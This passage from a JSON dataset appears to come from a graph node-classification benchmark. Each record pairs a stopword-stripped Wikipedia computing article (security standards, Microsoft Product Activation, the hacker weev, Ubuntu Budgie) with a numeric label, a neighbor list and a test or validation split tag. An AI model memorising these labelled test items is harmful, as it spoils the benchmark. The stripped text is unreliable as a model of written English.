iff similar formats",
    "neighbors": [
      1162,
      139,
      5264,
      2193,
      9236,
      3233,
      9249,
      9381,
      8618,
      6062,
      8369,
      8115,
      6075,
      11076,
      10570,
      11210,
      5709,
      1742,
      850,
      4564,
      6233,
      1631,
      5729,
      5736,
      11370,
      5743,
      7407,
      499,
      11123,
      9848,
      3323,
      124
    ],
    "mask": "Validation"
  },
  {
    "node_id": 433,
    "label": 4,
    "text": "Standard_of_Good_Practice_for_Information_Security:standard good practice information security standard good practice information security published information security forum isf business-focused practical comprehensive guide identifying managing information security risks organizations supply chains recent edition 2018 update 2016 edition upon release 2011 standard significant update standard four years covers information security 'hot topics consumer devices critical infrastructure cybercrime attacks office equipment spreadsheets databases cloud computing 2011 standard aligned requirements information security management system isms set iso/iec 27000-series standards provides wider deeper coverage iso/iec 27002 control topics well cloud computing information leakage consumer devices security governance addition providing tool enable iso 27001 certification 2011 standard provides full coverage cobit v4 topics offers substantial alignment relevant standards legislation pci dss sarbanes oxley act enable compliance standards standard used chief information security officers cisos information security managers business managers managers internal external auditors service providers organizations sizes 2018 standard available free charge members isf non-members able purchase copy standard directly isf standard historically organized six categories aspects computer installations networks address underlying infrastructure critical business applications run end-user environment covers arrangements associated protecting corporate workstation applications endpoint use individuals systems development deals new applications systems created security management addresses high-level direction control standard primarily published simple modular format eliminates redundancy example various sections devoted security audit review consolidated six aspects within standard composed number areas covering specific topic area broken sections contains detailed specifications information security best practice statement unique reference example sm41.2 indicates specification security management aspect area 4 section 1 listed specification 2 within section principles objectives part standard provides high-level version standard bringing together principles provide overview needs performed meet standard objectives outline reason actions necessary section published standard also includes extensive topics matrix index introductory material background information suggestions implementation information see list computing information-security related articles",
    "neighbors": [
      3552,
      4448,
      997,
      10823,
      399,
      11567,
      245,
      3447,
      6360,
      5373
    ],
    "mask": "Test"
  },
  {
    "node_id": 434,
    "label": 6,
    "text": "IEEE_P1619:ieee p1619 institute electrical electronics engineers ieee standardization project encryption stored data generically refers security storage working group siswg includes family standards protection stored data corresponding cryptographic key management siswg oversees work following standards base ieee 1619 standard architecture encrypted shared storage media uses xts-advanced encryption standard xex-based tweaked codebook mode tcb ciphertext stealing cts proper name xtc xex tcb cts acronym already used denote drug ecstasy p1619.1 authenticated encryption length expansion storage devices uses following algorithms p1619.2 standard wide-block encryption shared storage media proposed algorithms including p1619.3 standard key management infrastructure cryptographic protection stored data defines system managing encryption data rest security objects includes architecture namespaces operations messaging transport p1619 also standardized key backup xml format encryption algorithm used data storage support independent encryption decryption portions data so-called narrow-block algorithms operate relatively small portions data wide-block algorithms encrypt decrypt whole sector narrow-block algorithms advantage efficient hardware implementation hand smaller block size provides finer granularity data modification attacks standardized acceptable granularity however example possibility data modification granularity one bit bit-flipping attack generally considered unacceptable reasons working group selected narrow-block 128 bits encryption authentication standard p1619 assuming added efficiency warrants additional risk recognizing wide-block encryption might useful cases another project p1619.2 started study usage wide-block encryption project maintained ieee security storage working group siswg disk storage standard p1619 sometimes called p1619.0 tape storage standard p1619.1 standardized december 2007 discussion ongoing standardization wide-block encryption disk drives like cmc eme p1619.2 key management p1619.3 2004 2006 drafts p1619 standards used advanced encryption standard aes lrw mode 30 aug 2006 meeting siswg straw poll showed members would approve p1619 consequently lrw-aes replaced xex-aes tweakable block cipher p1619.0 draft 7 renamed xts-aes draft 11 members group found non-trivial abandon lrw available public peer-review many years unlike newly suggested variants issues lrw",
    "neighbors": [
      8708,
      7045,
      7049,
      5270,
      5671,
      6187,
      4396,
      3629,
      3762,
      3382,
      11321,
      7229,
      5439,
      3780,
      4563,
      10332,
      479,
      4581,
      5863,
      4456,
      7794,
      2932,
      11125,
      6904,
      8828,
      3838
    ],
    "mask": "Test"
  },
  {
    "node_id": 435,
    "label": 2,
    "text": "Stack-based_memory_allocation:stack-based memory allocation stacks computing architectures regions memory data added removed last-in-first-out lifo manner modern computer systems thread reserved region memory referred stack function executes may add state data top stack function exits responsible removing data stack minimum thread stack used store location function calls order allow return statements return correct location programmers may choose explicitly use stack region memory lies thread stack memory said allocated stack data added removed last-in-first-out manner stack-based memory allocation simple typically faster heap-based memory allocation also known dynamic memory allocation another feature memory stack automatically efficiently reclaimed function exits convenient programmer data longer required however data needs kept form must copied stack function exits therefore stack based allocation suitable temporary data data longer required creating function exits thread assigned stack size small bytes small cpus allocating memory stack available result crash due stack overflow processor families x86 special instructions manipulating stack currently executing thread processor families including powerpc mips explicit stack support instead rely convention delegate stack management operating system application binary interface abi",
    "neighbors": [
      2304,
      10883,
      8587,
      8474,
      11423,
      7589,
      5677,
      5040,
      5176,
      9921,
      7234,
      846,
      4562,
      5074,
      6868,
      10581,
      6751,
      499,
      3577,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 436,
    "label": 8,
    "text": "Aviary_(image_editor):aviary image editor aviary photo-editing platform ios android windows web web application aviary powers numerous mobile applications including self-titled ios android apps windows app called photo editor contains large collection easy-to-use editing tools custom photo filters frames graphics overlays aviary platform also free sdk provides developers customizable photo editor embedded apps ios android windows os x web company founded 2007 goal providing professional-quality photo-editing tools general public aviary since received millions dollars funding investors spark capital bezos september 22 2014 aviary acquired adobe systems later november 13 2014 aviary integrated suite adobe creative cloud december 2018 adobe announced remove aviary download stores end support product",
    "neighbors": [
      7595,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 437,
    "label": 7,
    "text": "Jem_The_Bee:jem bee jem bee java cloud-aware application implements batch execution environment help manage execution jobs described job control language jcl jem bee performs following functions core applications usually performed batch processing involves executing one batch jobs sequential flow job entry manager jem helps receive jobs schedule processing determine job output processed like ibm jes2 many batch jobs run parallel jcl used control operation job correct use jcl parameters allows parallel asynchronous execution jobs may need access data sets one goal jem process work making best use system resources achieve goal resource management needed key phases jem clustering based hazelcast cluster member called node rights responsibilities others exception oldest member going see details hazelcast implements peer-to-peer clustering master node node starts checks see already cluster network two ways find cluster found node first member cluster multicast enabled starts multicast listener respond incoming join requests otherwise listen join request coming via tcp/ip existing cluster already oldest member cluster receive join request checks request right group oldest member cluster start join process join process oldest member every member cluster member list order first member oldest member oldest member dies second member list becomes first member list new oldest member oldest member considered jem cluster coordinator execute actions must executed single member i.e locks releasing due member crash aside normal nodes another kind nodes cluster called supernodes supernode lite member hazelcast supernodes members storage join cluster lite members data partition data nodes get super fast access cluster like regular member nodes used web application running apache tomcat well application server diagram various nodes statuses execution environment set logical definition related cluster must used address job right member executed jem implements 3 kinds coordinates used tags named node belongs jcl defined run jem manages several queues used maintain life-cycle job queues implemented using hazelcast data sharing explanation job moved output queue submitter receive job ended notification via topic addition memory data sharing one important requirements jem use global file system gfs main goal able store data common file system jobs could manage reading writing nevertheless gfs mandatory desire data spread machines configuring jem separate environment specific domains affinities anyway gfs suggested used put keys keystores encryption licenses used jem following folders configured paths mount shared file system may different shared file systems one path needed nodes cluster refers files way avoid redundancy always date relative libraries versions binary versions etc ... documentation referred jem gfs global file system referring paths",
    "neighbors": [
      8640,
      3522,
      4194,
      5956,
      9762,
      1801,
      3629,
      5677,
      7053,
      11568,
      1363,
      3571,
      4535,
      11416,
      2974
    ],
    "mask": "Validation"
  },
  {
    "node_id": 438,
    "label": 9,
    "text": "List_of_ECMAScript_engines:list ecmascript engines ecmascript engine program executes source code written version ecmascript language standard example javascript new generation ecmascript engines web browsers implementing just-in-time compilation jit variations idea performance benefits just-in-time compilation make much suitable web applications written javascript",
    "neighbors": [
      1409,
      259,
      8068,
      3462,
      6791,
      8584,
      1802,
      6154,
      10507,
      8854,
      4378,
      10012,
      3229,
      8605,
      7455,
      6176,
      8479,
      1698,
      803,
      8609,
      3237,
      5031,
      3761,
      1203,
      10419,
      11060,
      4920,
      1470,
      5311,
      2880,
      7871,
      9152,
      4171,
      5067,
      3407,
      11087,
      339,
      84,
      4822,
      4056,
      9560,
      9561,
      603,
      8923,
      8289,
      482,
      5219,
      7396,
      4326,
      487,
      5483,
      9195,
      5101,
      8557,
      10991,
      10097,
      10739,
      10744,
      6143
    ],
    "mask": "Test"
  },
  {
    "node_id": 439,
    "label": 3,
    "text": "Ubuntu_Budgie:ubuntu budgie ubuntu budgie formerly budgie-remix official community flavor ubuntu featuring budgie desktop combines stable thoroughly-tested ubuntu core modern lightweight traditional-looking desktop developed solus project ubuntu budgie started unofficial community flavor parallel ubuntu 16.04 lts referred budgie-remix budgie-remix 16.10 later released strictly following time frame issued ubuntu 16.10 eventually recognized official community flavor ubuntu rebranded ubuntu budgie vincenzo bovino hired new brand pr manager ubuntu budgie 17.04 released april 2017 updated version 17.10 october 2017 ubuntu budgie 18.10 32-bit support dropped 32-bit support also dropped ubuntu mate budgie-remix 16.04 released april 25 2016 four days release ubuntu 16.04 system contains budgie desktop 10.2.5 window manager based mutter customizable panel notification center settings arc-gtk+ theme used compared ubuntu 16.04 budgie-remix nautilus version 3.18 time ubuntu version nautilus 3.14 also dock-panel plank version 0.11.1 gedit version 3.18 gnome 3.18 photos gthumb 3.4.3 rhythmbox 3.3 totem 3.18 gnome terminal 3.18 libreoffice 5.1.2 mozilla firefox 45.0 transmission 2.84 gtk+ 3.18.9 mesa 11.2.0 xorg 1.18.3 linux kernel 4.4.0. budgie-remix 16.10 released october 16 2016 three days release ubuntu 16.10 system contains shell budgie desktop 10.2.7 gtk+ 3.22 linux kernel 4.8 many new features implemented version full disk encryption home folder encryption support multiple languages installation theme design arc gtk+ new theme icons pocillo one developers budgie-remix david mohammed says ubuntu budgie 17.04 released april 19 2017. budgie-remix renamed name distribution became official ubuntu community system contains budgie desktop 10.2.9 shell linux 4.10 kernel mesa 17.0.3 xorg 1.19.3 budgie-welcome application updated support application indicator appeared sound applets managed gnome 3.24 applications enabled gnome terminal replaced termix chromium replaced google chrome gtk+ theme support qt enabled use theme design arc gtk+ theme icons moka record release version written follows ubuntu budgie 17.10 released october 19 2017 system contains budgie desktop 10.4 shell linux 4.13 kernel budgie 10.4 desktop environment equipped set native features include new stylish alt-tab support spotify raven support switching window controls left right support smb files encrypted volumes addition applets supports customizing appearance dates times addition support left right side panels budgie desktop 10.4 support converting panels dock transparency dynamic auto-image panels ability replenish bottom panel work without terrible jump effect noteworthy improvements release ubuntu budgie 17.10 include night light caffeine tools tilix default terminal emulator instead termix well support tilix quake mode f12 key updated panel icons new wallpapers december 20 2017 canonical withdrew ubuntu 17.10 distribution october hid link site downloading reason critical bug bios damage lenovo notebook models one acer model january 12 2018 version 17.10.1 released contained correction serious problem version 17.10 ubuntu budgie released april 26 2018 system includes linux 4.15 kernel became possible install openvnc network-manager new applets appeared quick note notes dropby downloading viewing data usb devices hot corners moving windows corner screen windowpreviews viewing open windows clockworks viewing time zones autoswitch tying keyboard layout application window mover order quickly move window another virtual desktop gnome applications updated version 3.28 nautilus version 3.26",
    "neighbors": [
      4611,
      3079,
      3089,
      4113,
      8209,
      8727,
      543,
      11297,
      7204,
      9253,
      11305,
      56,
      3129,
      4153,
      59,
      8248,
      9276,
      4673,
      3654,
      5190,
      3147,
      2125,
      1107,
      1110,
      89,
      5721,
      4192,
      3685,
      9324,
      10860,
      5742,
      2671,
      3189,
      5755,
      11388,
      2692,
      8837,
      9353,
      9873,
      11410,
      8857,
      10394,
      6301,
      10397,
      5279,
      673,
      3745,
      1700,
      7332,
      7845,
      10920,
      9899,
      3245,
      7854,
      2738,
      4790,
      4279,
      10425,
      2239,
      9407,
      708,
      2763,
      8907,
      3791,
      6352,
      7385,
      11481,
      5343,
      7913,
      6890,
      5356,
      6380,
      7920,
      6898,
      5363,
      9971,
      9461,
      1782,
      8438,
      5369,
      6393,
      8957,
      4355,
      5380,
      7435,
      2321,
      6934,
      4887,
      8476,
      8992,
      10016,
      5410,
      10530,
      6436,
      2853,
      3369,
      6445,
      823,
      3387,
      7483,
      3903,
      11587,
      2375,
      5959,
      5962,
      4951,
      9048,
      8033,
      2914,
      5990,
      9064,
      7020,
      7534,
      11121,
      2930,
      9074,
      1396,
      11648,
      390,
      1416,
      905,
      10127,
      912,
      11669,
      3478,
      10646,
      926,
      9119,
      10149,
      6055,
      7082,
      1455,
      8112,
      948,
      10687,
      10694,
      4039,
      5067,
      975,
      9689,
      2010,
      9693,
      3550,
      6625,
      7140,
      485,
      495,
      8177,
      8180,
      5110,
      11263
    ],
    "mask": "Test"
  },
  {
    "node_id": 440,
    "label": 2,
    "text": "Microsoft_Product_Activation:microsoft product activation microsoft product activation drm technology used microsoft corporation several computer software programs notably windows operating system office productivity suite procedure enforces compliance program end-user license agreement transmitting information product key used install program user computer hardware microsoft inhibiting completely preventing use program validity license confirmed procedure met significant criticism many consumers technical analysts computer experts argue poorly designed highly inconvenient ultimately nothing prevent software piracy process successfully circumvented multiple occasions installing retail copy windows office user asked input unique product key supplied certificate authenticity included program later verified activation immediate activation required following installation program must activated within specific period time order continue function properly throughout grace period user periodically reminded activate program warnings becoming frequent time certain versions windows office available volume license single product key used multiple installations programs purchased license must still activated exception windows xp versions office released prior office 2010 businesses using licensing system option using microsoft activation servers creating managing windows pre-installed computer original equipment manufacturer oem operating system automatically activated without need interaction user case copy windows installed use product key listed certificate authenticity rather master product key issued oems called system locked pre-installation slp key boot windows confirms presence specific information stored bios manufacturer ensuring activation remains valid computer even product key used another machine activation performed within grace period fails illegal invalid product key following restrictions imposed user activation takes place program saves record verification data user computer system booted significant hardware changes application likely require reactivation prevent copy program installed two different systems windows 10 activation process also generate digital entitlement allows operating system hardware license status saved activation servers operating system license automatically restored clean installation without need enter product key activation performed utility supplied windows office called activation wizard performed either internet telephone activating internet activation wizard automatically transmits receives verification data microsoft servers completing process without interaction user activation telephone requires user microsoft agent verbally exchange activation information case installation id generated read agent agent verifies information replies confirmation id typed activation wizard activation wizard generates verification data primarily based information hardware computer windows xp information following eight categories hardware included verification data also based product key entered activation cases product key checked list known illegally distributed keys certain retail copies windows office sold certain countries classified emerging markets geographical activation restrictions allow user activate product within indicated region activation completes successfully user continue use application without issues impediments also key gets blacklisted application continue run normal unless clean install activation performed key blacklisted following tables illustrate usage product activation throughout microsoft software specifying whether programs equipped retail volume licensing activation well geographical activation restrictions microsoft says product activation benefits consumers allowing microsoft produce higher quality software nevertheless received much criticism regarding design implementation effectiveness stopping piracy respect privacy rights instance development windows xp beta testers strongly criticized introduction product activation particularly change computer hardware required re-activation ken fischer ars technica questioned whether activation would ultimately effective stopping piracy stating casual computer users would affected would fool think someone wo n't find way break whole thing dave wilson technology columnist los angeles times describes activation another example rapacious monopolist abusing computer users helpless anything believed system would significant effect professional pirates fred langa informationweek reference transmission hardware information activation stated many users incensed level monitoring intrusion control microsoft finally dr. cyrus peikari seth fogie security consultants considered product activation hostile privacy human dignity others defend microsoft use product activation harrison group market research firm conducted study sponsored microsoft 2011 illustrating computers running activated versions windows software average 50 faster pirated counterparts group concluded stating users genuine microsoft products ultimately receive superior performance counterfeit users susceptible security issues lost productivity fully licensed gmbh developer digital rights management technology criticizing microsoft vague nature information sent given computer activation nevertheless concluded activation particularly intrusive significantly violate privacy microsoft product activation also criticized multiple occasions violating patent law 2006 microsoft required pay 142 million z4 technologies infringing product activation patent 2009 microsoft ordered pay 388 million uniloc patent infringement product activation windows xp office xp windows server 2003 microsoft product activation cracked circumvented numerous occasions since introduced 2001 2001 uk security company called bit arts successfully managed bypass product activation windows xp 2003 volume license keys windows xp leaked public allowing users purchased volume license operating system bypass activation 2009 several security flaws windows 7 used hackers circumvent activation since introduction windows vista attempts circumvention product activation focused using leaked slp product keys bios information used oems preactivate windows 2007 circumvention measure developed windows vista warez-group paradox simulates bios allowing leaked slp information fed operating system bypassing activation 2009 slp product keys certificate information windows 7 leaked public allowing bios reconfigured bypass activation",
    "neighbors": [
      11144,
      6797,
      4505,
      8103,
      3496,
      7983,
      6972,
      9791,
      2244,
      2632,
      460,
      4309,
      4447,
      7523,
      4074,
      1515,
      1776,
      1904,
      9328,
      7411,
      2046
    ],
    "mask": "Test"
  },
  {
    "node_id": 441,
    "label": 4,
    "text": "Weev:weev andrew alan escher auernheimer born best known pseudonym weev american computer grey hat hacker affiliated alt-right identified using variety aliases media although sources correctly provide first name andrew member hacker group goatse security auernheimer exposed flaw security compromised e-mail addresses ipad users revealing flaw media group also exposed personal data 100,000 people led criminal investigation indictment identity fraud conspiracy auernheimer sentenced 41 months federal prison served approximately 13 months conviction vacated higher court 2016 auernheimer responsible sending thousands white-supremacist flyers unsecured web-connected printers multiple universities locations u.s since release prison lived variety locations eastern europe middle east 2017 reported acting webmaster neo-nazi website daily stormer auernheimer claimed responsibility reclassification many books gay issues pornography amazon services april 2009 amazon said responsible incident even amazon incident several media publications profiled regarding hacking trolling activities including new york times claimed member hacker group called organization making 10 million annually also claimed owner rolls-royce phantom times story auernheimer published reporters sought commentary hacking-related stories gawker published story sarah palin email hacking incident prominently featured auernheimer comments title story 2008 new york times interview besides claiming make millions dollars rolls-royce also claimed memphis two handle used troll author game developer kathy sierra response touchy reaction receiving threatening comments blog memphis two posted libelous account career online including charges former sex worker home address social security number post instigated harassment abuse sierra led withdraw online activity several years member gay nigger association america anti-blogging trolling group take name 1992 danish movie gayniggers outer space members goatse security involved ipad hack also members gnaa also formerly gnaa president auernheimer member group computer experts known goatse security exposed flaw security allowed e-mail addresses ipad users revealed contrary first claimed group revealed security flaw gawker media notified also exposed data 114,000 ipad users including celebrities government military group actions rekindled public debate disclosure security flaws auernheimer maintains goatse security used common industry standard practices said tried good guys jennifer granick electronic frontier foundation also defended methods used goatse security fbi opened investigation incident led criminal complaint january 2011 computer fraud abuse act shortly investigation opened fbi local police raided auernheimer home arkansas fbi search related investigation security breach auernheimer instead detained state drug charges police allege execution search warrant related breach found cocaine ecstasy lsd schedule 2 3 pharmaceuticals released 3,160 bail pending state trial release bail broke gag order protest maintained violations civil rights particular disputed legality search house denial access public defender also asked donations via paypal defray legal costs january 2011 drug-related charges dropped immediately following auernheimer arrest federal authorities u.s. justice department announced would charged one count conspiracy access computer without authorization one count fraud although co-defendant daniel spitler quickly released bail auernheimer initially denied bail unemployment lack family member host incarcerated federal transfer center oklahoma city released 50,000 bail late february 2011 federal grand jury newark new jersey indicted auernheimer one count conspiracy gain unauthorized access computers one count identity theft july 2011 september 2011 freed bail raising money legal defense fund november 20 2012 auernheimer found guilty one count identity fraud one count conspiracy access computer without authorization november 29 2012 auernheimer wrote article wired entitled forget disclosure – hackers keep security holes advocating disclosure zero-day exploit individuals use interests social justice january 2013 techcrunch article likened prosecution aaron swartz writing march 18 2013 found guilty identity fraud conspiracy access computer without authorization auernheimer sentenced 41 months federal prison ordered pay 73,000 restitution prior sentencing posted ask anything thread reddit comments hope give maximum people rise storm docks regret nice enough give chance patch dropping dataset gawker wo n't nearly nice next time cited prosecution next day court justification sentence later march 2013 civil rights lawyer george washington university law school faculty orin kerr joined auernheimer legal team free charge auernheimer serving sentence federal correctional institution allenwood low low-security federal prison pennsylvania scheduled release january 2016 july 1 2013 legal team filed brief third circuit court appeals arguing convictions reversed violated relevant provisions computer fraud abuse act april 11 2014 third circuit issued opinion vacating auernheimer conviction basis venue new jersey improper judges address substantive question legality site access skeptical original conviction noting circumvention passwords occurred publicly accessible information obtained released prison april 11 2014 october 2014 auernheimer published article neo-nazi blog daily stormer announced white nationalist 2012 told gawker jewish ancestry also claimed converted mormonism according pandodaily auernheimer living lebanon 2014 order avoid prosecution united states 2016 told interviewer living kharkiv ukraine southern poverty law center reported auernheimer left ukraine 2017 tiraspol capital transnistria self-proclaimed republic eastern europe october 2015 auernheimer published names u.s. government employees exposed adult friendfinder ashley madison data breaches told cnn went straight government employees seem easiest shame also involved release undercover planned parenthood videos temporary restraining order washington post quoted saying lulz pair incidents 2016 auernheimer sent flyers adorned racist antisemitic messages thousands unsecured printers across u.s. flyers bearing swastikas promoting daily stormer sent several universities also claimed responsibility 50,000 flyers sent printers across u.s. urging killing black jewish children praising anders behring breivik killed 77 people pair terrorist attacks norway 2011 claimed used tool scour internet unsecured printers finding million vulnerable devices email leak buzzfeed news october 2017 revealed auernheimer contact milo yiannopoulos asked auernheimer advice article alt-right yiannopoulos asked editor breitbard permission auernheimer appear podcast rejected since editor want breitbart associate legit racist 2017 auernheimer reported working webmaster daily stormer despite neo-nazi affiliations auernheimer mother stated jewish relatives sides family",
    "neighbors": [
      1024,
      5636,
      4117,
      8726,
      535,
      9761,
      4644,
      4133,
      8244,
      1608,
      3657,
      8779,
      82,
      4703,
      8288,
      8292,
      119,
      10875,
      3711,
      8320,
      5764,
      2187,
      4240,
      1688,
      2717,
      9375,
      9904,
      9395,
      8886,
      3789,
      4304,
      4314,
      9435,
      4830,
      3807,
      5349,
      1254,
      10477,
      10995,
      9460,
      7418,
      2815,
      3843,
      10502,
      10003,
      6947,
      297,
      2857,
      8489,
      11052,
      9518,
      1337,
      6484,
      857,
      1882,
      7515,
      4956,
      3956,
      9082,
      6539,
      11659,
      11152,
      10132,
      1440,
      5024,
      5028,
      11175,
      5547,
      7601,
      1970,
      1979,
      4027,
      9664,
      8133,
      4054,
      7639,
      8664,
      1504,
      9186,
      2542,
      507
    ],
    "mask": "None"
  },
  {
    "node_id": 442,
    "label": 3,
    "text": "SPARCstation_ZX:sparcstation zx sparcstation zx computer workstation produced sun microsystems launched august 1993 end-of-lifed march 1994 original price usd 19,995.00 sparcstation zx identical sparcstation lx addition sun zx also known leo accelerated 3d framebuffer card double-width double-decked sbus card providing 24-bit color performance 750,000 3d vectors per second 310,000 triangle mesh/second",
    "neighbors": [
      9665,
      9955
    ],
    "mask": "Test"
  },
  {
    "node_id": 443,
    "label": 9,
    "text": "Programming_style:programming style programming style also known code style set rules guidelines used writing source code computer program often claimed following particular programming style help programmers read understand source code conforming style help avoid introducing errors classic work subject elements programming style written 1970s illustrated examples fortran pl/i languages prevalent time programming style used particular program may derived coding conventions company computing organization well preferences author code programming styles often designed specific programming language language family style considered good c source code may appropriate basic source code etc however rules commonly applied many languages good style subjective matter difficult define however several elements common large number programming styles issues usually considered part programming style include layout source code including indentation use white space around operators keywords capitalization otherwise keywords variable names style spelling user-defined identifiers function procedure variable names use style comments programming styles commonly deal visual appearance source code goal readability software long available formats source code automatically leaving coders concentrate naming logic higher techniques practical point using computer format source code saves time possible enforce company-wide standards without debates indent styles assist identifying control flow blocks code programming languages indentation used delimit logical blocks code correct indentation cases matter style languages indentation white space affect function although logical consistent indentation makes code readable compare something like first two examples probably much easier read indented established way hanging paragraph style indentation style especially useful dealing multiple nested constructs note however example simply moduliq zero indent style groups carriage returns rather indents compare lua use traditional curly braces parenthesis if/else statements require expression followed codice_1 closing if/else statement codice_2 indentation optional codice_3 codice_4 codice_5 used true/false statements true/false statements would mean false python uses indentation indicate control structures correct indentation required need bracketing curly braces i.e codice_6 codice_7 eliminated hand copying pasting python code lead problems indentation level pasted code may indentation level current line reformatting tedious hand text editors ides features automatically also problems python code rendered unusable posted forum web page removes white space though problem avoided possible enclose code white space-preserving tags pre ... /pre html code ... /code bbcode etc notice python use curly braces regular colon e.g codice_8 many python programmers tend follow commonly agreed style guide known pep8 tools designed automate pep8 compliance haskell similarly off-side rule i.e two dimension syntax indentation meaningful define blocks although alternate syntax uses curly braces semicolons haskell declarative language statements declarations within haskell script example may written one line haskell encourage use literate programming extended text explain genesis code literate haskell scripts named codice_9 extension everything comment except blocks marked code program written latex case codice_10 environment marks code also active code paragraph marked preceding ending empty line starting line code greater sign space example using latex markup example using plain text often helpful align similar elements vertically make typo-generated bugs obvious compare latter example makes two things intuitively clear clear former however note arguments vertical alignment example simple refactoring operation performed code renaming variables replacement r anothervalue resulting code look like original sequential formatting still look fine change situations white space required grammars free-format languages unconcerned amount appears style related white space commonly used enhance readability currently known hard facts conclusions studies whitespace styles best readability instance compare following syntactically equivalent examples c code versus use tabs create white space presents particular issues enough care taken location tabulation point different depending tools used even preferences user example one programmer prefers tab stops four toolset configured way uses format code another programmer prefers tab stops eight toolset configured way someone else examines original person code may well find difficult read one widely used solution issue may involve forbidding use tabs alignment rules tab stops must set note tabs work fine provided used consistently restricted logical indentation used alignment",
    "neighbors": [
      3876,
      6502,
      8262,
      8775,
      4777,
      5710,
      5651,
      8502,
      3960,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 444,
    "label": 8,
    "text": "Web_banner:web banner web banner banner ad form advertising world wide web delivered ad server form online advertising entails embedding advertisement web page intended attract traffic website linking website advertiser many cases banners delivered central ad server advertiser scans logfiles detects web user visited advertiser site content site clicking banner ad advertiser sends content provider small amount money usually around five ten us cents payback system often content provider able pay internet access supply content first place usually though advertisers use ad networks serve advertisements resulting revshare system higher quality ad placement web banners function way traditional advertisements intended function notifying consumers product service presenting reasons consumer choose product question fact first documented hotwired 1996 researchers rex briggs nigel hollis web banners differ results advertisement campaigns may monitored real-time may targeted viewer interests behavior often tracked use click tag many web surfers regard advertisements annoying distract web page actual content waste bandwidth cases web banners cover screen content user wishes see newer web browsers often include software adblocker options disable pop-ups block images selected websites another way avoiding banners use proxy server blocks privoxy web browsers may also extensions available block banners example adblock plus mozilla firefox adthwart google chrome ie7pro internet explorer pioneer online advertising prodigy company owned ibm sears time prodigy used online advertising first promote sears products 1980s advertisers including aol one prodigy direct competitors prodigy unable capitalize first mover advantage online advertising first clickable web ad later came known term banner ad sold global network navigator gnn 1993 heller ehrman white mcauliffe defunct law firm silicon valley office gnn first commercially supported web publication one first commercial web sites ever hotwired first web site sell banner ads large quantities wide range major corporate advertisers andrew anker hotwired first ceo rick boyce former media buyer san francisco advertising agency hal riney partners spearheaded sales effort company hotwired coined term banner ad first company provide click rate reports customers first web banner sold hotwired paid corp. put online october 27 1994 another source also credits hotwired october 1994 coors zima campaign first web banner may 1994 ken mccarthy mentored boyce transition traditional online advertising first introduced concept clickable/trackable ad stated believed direct response model—in return investment individual ads measured—would prove sustainable long run online advertising spite prediction banner ads valued sold based number impressions generated first central ad server released july 1995 focalink communications enabled management targeting tracking online ads local ad server quickly followed netgravity january 1996 technology innovation ad server together sale online ads impression basis fueled dramatic rise proliferation web advertising provided economic foundation web industry period 1994 2000 new online advertising model emerged early years 21st century introduced goto.com later overture yahoo mass marketed google adwords program relies heavily tracking ad response rather impressions banner ad played significant role enabling rapid development paid advertising internet standard formats operation clickable link destination pricing system impressions banner ad enabled web site sell advertising provided operating requirements ad server companies netgravity develop systems needed operate track web-based advertising banner ad also unique compared advertising appearing comparable media newspapers magazines unlike advertising periodicals banner ad encouraged media consumers actually leave media service product go separate media environment typically web site operated advertiser contrast readers viewing newspaper magazine advertising encouraged leave periodical rather message advertising intended influence reader ad sizes standardized extent iab prior iab standardization banner ads appeared 250 different sizes however websites advertising networks outside eurosphere north america may use iab base ad sizes iab ad sizes standard web banners included iab universal package ad units guidelines supported major ad serving companies particularly relevant iab members adform appnexus chitika conversant epom hiro mixpo spotxchange zedo many others additionally ad serving providers may offer non-standard banner sizes technologies well support different online advertising formats e.g native ads however standard banner ad sizes constantly evolving due consumer creative fatigue banner blindness ad companies consistently test performance ad units ensure maximum performance clients publishers known unique custom executions include buzzfeed craveonline quartz publication thought catalog elite daily vice media inc. mic media company many others according media research firm emarketer types custom executions publisher direct buys rise native advertising spending hit 4.3 billion end 2015 use web banners restricted online advertising hero images widespread examples non-advertising application web banners banners type constitute part website design typically used aesthetic reasons hero images represented large photos graphics videos placed prominent sections website",
    "neighbors": [
      5536,
      9187,
      488,
      3688,
      6538,
      8735,
      6576,
      2611,
      4725,
      119,
      24,
      3323,
      988,
      4797,
      8639
    ],
    "mask": "Test"
  },
  {
    "node_id": 445,
    "label": 3,
    "text": "Ys_III:_Wanderers_from_Ys:ys iii wanderers ys ys iii initially released pc-8801 pc-9801 1989 versions msx2 x68000 soon followed 1991 number console ports produced versions turbografx-cd famicom snes sega genesis port playstation 2 released taito corporation 2005 turbografx-cd snes genesis ports well playstation portable microsoft windows remake received official english-translated releases addition famicom msx2 ports fan-translated opening scene informs player three years since events adol christin friend dogi journey passing town find gypsy caravan dogi fortune told fortune teller crystal ball explodes adol dogi decide go dogi hometown redmont way redmont pair chance upon wildcat attacks saving dogi childhood friend elena stoddart process upon arriving learn townspeople threatened men nearby valestein castle always ready adventure adol decides assume task helping travelling tigray quarry adol discovers cave monsters taken quarry adol travels deep inside quarry rescue edgar mayor redmont defeating boss quarry ellefale claiming first statue adol finds chester brother elena threatening edgar adol pulls edgar back entrance quarry goes back redmont meeting elena formally time adol learns statues sought lord macguire king felghana province game takes place another statue sought illsburn ruins adol travels retrieve another townsperson father pierre gone well adol gets altar sorts overhears chester talking pierre brief duel chester adol caught tells chester elena worried lord macguire watching chester rebuffs adol kicks pit lava battling monsters adol finds fire dragon gilan defeats reward gets adol large river lava solidifying escaping pit ellena meets adol top staircase informs statue indeed hidden opens hidden door fights wyvern claiming second statue upon coming back town adol meets dogi informs heading mountains edgar wishes see adol adol meets edgar informs men valestein ballacetine snes version castle actively seeking statues informs adol statue tigray quarry adol proceeds quarry defeats monster guarding third statue adol heads back redmont inform edgar upon arriving edgar house interrupts conversation edgar lord macguire bishop garland galbalan galbalan according edgar demon tremendous power used rule populace felgana long time ago sealed away hero using four statues adol sent eldarm mountains chat hermit living adol finds dogi chatting master mountain master tells adol statue indeed mountains inaccessible due statue guards entrance adol travels mountain peak defeats harpy gaining staff opens way statue defeats guardian dragon claims fourth final statue chester show tries force adol hand four statues cave interrupts conversation dogi digs two men chester reunited dogi converse briefly adol dogi leave town find almost deserted mr. gardner town guard nowhere found inside walls find mr. gardner townsfolk apparently adol dogi mountains soldiers valestein castle came town kidnapped townsfolk exchange statues adol converses edgar setting castle valestein castle adol fights way dungeons finds townspeople father pierre tells pierre get people castle goes find lord macguire way lord macguire chambers comes across bishop garland taunts adol garland reveals adol defeats lengthy battle upon reaching lord macguire adol finds lord macguire repentant sorry actions make reparations actions adol goes back 